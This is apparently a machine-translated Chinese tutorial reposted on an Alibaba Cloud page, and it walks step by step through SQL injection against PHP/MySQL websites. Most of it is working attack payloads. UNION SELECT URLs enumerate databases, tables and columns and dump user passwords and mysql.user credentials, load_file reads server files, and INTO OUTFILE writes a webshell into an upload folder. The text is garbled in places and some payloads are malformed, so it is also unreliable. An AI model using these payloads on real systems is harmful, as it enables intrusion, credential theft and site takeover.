Home > Developer > MySQL

Php+mysql Injection

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

    1. SQL Simple Command Description:
    2. Mysql.exe-u User name-p password-H IP address
    3. show databases; View the database
    4. The version number of the Select version ();p HP injection
    5. Use database (table name);
    6. Show tables; shows the table name of this table
    7. SELECT * FROM table;
    8. Insert Update, and so on
    9. into outfile ' path ' (Export data to path)
    10. Select Load_file (hex) View path hex encoded content

SQL functions to inject:

    1. Version () (This is important to decide how to inject)
    2. Database () Databases name--Know the database name, and then use it to get the table
    3. User () Current users
    4. @ @version_compile_os Operating System

Injection process:

    1. Determine if there is an injection: http:www.cc.com/show.php?id=1
    2. Order BY to get the number of columns: for example, 5.
    3. The Union Select then obtains the information: Http:www.cc.com/show.php?id=1 and 1=2 UNION Select 1,2,3,4,5-(the wrong position of the newspaper, such as the burst 2,3,4,5)
    4. Then obtain the version number, database name, current user, operating system and other information; http://www.cc.com/show.php?id=1 UNION SELECT 1,version (), database (), user (), @ @version_ Compile_os--
    5. And then exploded. Table name: http://www.cc.com/show.php?id=1 UNION SELECT 1,table_name,4,5 from Information_schema.tables where Table_schema =hex (database name), if all the names of the table, then should be GROUP_CONCAT (table_name);
    6. And then the list name: http:www.cc.com/show.php?id=1 UNION SELECT 1,2,column_name, 4,5 from Information_schema.schema.columns where Table_name=hex (table name); All the names are Group_concat (column_name);
    7. Last burst field: http:www.cc.com/show.php?id=1 UNION SELECT 1, user name, 3, password, 5 from table name.

Summarize:

Database name:

Table Name:

Column Name:

Last Burst field:

Inject intrusion under Permissions

    1. Requires root privileges or higher permissions
    2. View file for information about: Load_file
    3. Import and export a word take webshell:into outfile

Get site Root path:

    1. Google Hacker site: URL waring
    2. File error (mainly followed by the single quotation mark what the wrong character, to see if an error)
    3. View sensitive files: info.php phpinfo.php test.php and other exposed web site PHP information in the root directory of the site

Example:

    1. Get the Web root directory from above: for example d:/web/www/index.php;
    2. View file for information about: http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT, Load_file (' d:/web/www/index.php '), 4,5--
    3. View files in PHP database: Try conn.php common.php config.php or crawl through the scanner which files, such as: http://www.cc.com/conn.php no error, but no information displayed;
    4. Then through http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1,2,load_file (' d:/web/www/con.php '), 4,5--
    5. Note If you do not use single quotes in the Load_file file, you must encode it with hex.
    6. Export a sentence take webshell:http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1, 2, ' one word trojan ', 4,5 into outfile ' d:/web/www/manage/ upload/img/1.php ' (website path, where can I get a scan, or?) )
    7. Get Database account and password: http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1,2,3,password,5 from Mysql.user;

Php+mysql Injection

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More